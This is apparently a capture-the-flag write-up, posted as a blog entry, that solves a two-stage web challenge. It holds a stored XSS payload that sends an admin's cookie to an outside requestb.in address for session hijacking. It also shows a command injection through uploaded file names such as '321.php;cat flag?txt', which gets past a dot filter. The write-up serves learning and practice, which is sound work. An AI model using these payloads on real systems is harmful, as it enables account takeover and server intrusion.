Chall:
I found this amazing blog about Iceland! Did I ever tell you that I love Iceland? It seems to be made from scratch by a single guy although being impressive, he doesn’t seem too have much experience with web programming. Can you see if you can find any vulnerabilites to pwn his machine?
This is nice website, first we have to login to access some function of it.
This chall is about 2 stage:
Stage 1: Cross-Site Scripting
Since we login, we have cookie
session=eyJ1c2VyIjozOX0.CqHuQA._9DBnFghkXsPrugp8vYM5pYUP-8 (for me)
and there is a comment area with report button, i was thinking about XSS.
So construct the payload, post it and report to admin to leak his cookie via stored XSS.
<img src=x onerror=this.src='http://requestb.in/1k4cnub1?z='+document.cookie>
Okay thank admin, i got this gift :
hijack it:
WE ADMIN NOW!!!
Stage 2: From Upload to Command Injection
When i upload php file:
And upload zip file:
Even a ….binary file:
So what does it all means? A little google skill will tell you this website use file command of linux to determine which type of our upload file.
file 123php
And with the chain of the string, Command injection will be perfomed, let make a file named 123.php;ls :
Since they filter dot (.) , we can replace it with question mask (?). New file name is “321.php;cat flag?txt”. Isn’t it eassy huh?
wow Thank you I was wondering how to do it haha 😀
LikeLike